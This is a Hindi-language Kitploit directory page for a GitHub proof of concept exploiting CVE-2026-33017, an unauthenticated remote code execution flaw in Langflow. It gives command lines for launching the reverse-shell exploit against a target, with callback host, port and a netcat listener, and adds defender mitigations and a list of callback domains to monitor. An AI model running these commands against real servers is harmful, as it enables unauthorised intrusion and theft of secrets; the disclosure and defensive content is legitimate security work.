Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
उपकरण/GitHubGitHub/tatosec/cve-2026-33017-langflop
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

रिपॉजिटरी देखें
61 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33017 Langflow ("Langflop") बिना प्रमाणीकरण वाला RCE PoC

Langflow में बिना प्रमाणीकरण वाली build_public_tmp कोड-निष्पादन खामी के लिए PoC। यह एक दुर्भावनापूर्ण घटक को सार्वजनिक flow पर अपलोड करता है, build ट्रिगर करता है, और reverse shell पकड़ता है।

केवल अधिकृत सुरक्षा परीक्षण के लिए। केवल उन्हीं सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।

आवश्यकताएँ

  • Python 3
  • requests (pip install requests)

उपयोग

अंतर्निहित listener चलाएँ और exploit को एक ही बार में दागें:

python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

जब shell कनेक्ट होता है, तो यह स्वचालित रूप से पूर्ण इंटरैक्टिव shell में अपग्रेड करने का प्रयास करता है।

यदि आप अपना खुद का listener उपयोग करना चाहें (जैसे nc -lvnp 4444), तो --listen हटा दें:

python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

विकल्प

फ़्लैगविवरण
--urlलक्ष्य Langflow सर्वर URL (आवश्यक)
--flow-idसाझा सार्वजनिक flow का UUID (आवश्यक)
--lhostReverse shell कॉलबैक IP (आवश्यक)
--lportReverse shell कॉलबैक पोर्ट (आवश्यक)
--listenअंतर्निहित listener चलाएँ
--timeoutHTTP अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट 30)
-k, --insecureTLS प्रमाणपत्र सत्यापन अक्षम करें (self-signed / समाप्त हो चुके प्रमाणपत्र)
--no-upgradeस्वचालित TTY अपग्रेड छोड़ें, बुनियादी लाइन shell का उपयोग करें

जानकारी

CVE-2026-33017, Langflow के POST /api/v1/build_public_tmp/{flow_id}/flow endpoint में एक बिना प्रमाणीकरण वाला RCE है, जो बिना sandboxing के flow node परिभाषाओं से हमलावर द्वारा आपूर्ति किया गया Python निष्पादित करता है। अधिक जानने के लिए नीचे दिए गए संसाधन देखें:

  • Sysdig Threat Research लेख: CVE-2026-33017: हमलावरों ने 20 घंटों में Langflow AI पाइपलाइनों से कैसे समझौता किया
  • NVD: CVE-2026-33017

अनुशंसाएँ (रक्षक)

Sysdig Threat Research लेख से शमन उपाय:

  • अपडेट करें Langflow को तुरंत। यदि पैच किया गया संस्करण अभी उपलब्ध नहीं है, तो /api/v1/build_public_tmp endpoint तक नेटवर्क पहुँच प्रतिबंधित करें या सार्वजनिक flow निर्माण पूरी तरह अक्षम कर दें।
  • ऑडिट करें किसी भी सार्वजनिक रूप से एक्सपोज़्ड Langflow इंस्टेंस पर environment variables और secrets। एहतियात के तौर पर API कुंजियाँ, डेटाबेस पासवर्ड और क्लाउड क्रेडेंशियल्स रोटेट करें।
  • निगरानी करें असामान्य पोर्ट्स या ज्ञात कॉलबैक सेवाओं (oastify.com, interact.sh, dnslog.cn) के लिए आउटबाउंड कनेक्शनों की, जो सक्रिय शोषण और डेटा बहिर्गमन का संकेत देते हैं।
  • प्रतिबंधित करें Langflow इंस्टेंसों तक नेटवर्क पहुँच को फ़ायरवॉल नियमों या प्रमाणीकरण वाले reverse proxy का उपयोग करके। !!प्रमाणीकरण परत के बिना Langflow को सीधे इंटरनेट पर एक्सपोज़ नहीं किया जाना चाहिए!!
  • सूचीबद्ध करें अपने environment में AI/ML टूलिंग की। Langflow, n8n और अन्य workflow ऑटोमेशन टूल जैसे प्लेटफ़ॉर्म तेजी से निशाना बनाए जा रहे हैं क्योंकि वे अक्सर व्यापक API पहुँच के साथ चलते हैं और मानक सुरक्षा समीक्षा प्रक्रियाओं के बाहर तैनात किए जाते हैं।

अस्वीकरण

यह टूल शोध और अधिकृत पैठ परीक्षण के लिए प्रदान किया गया है। लेखक दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें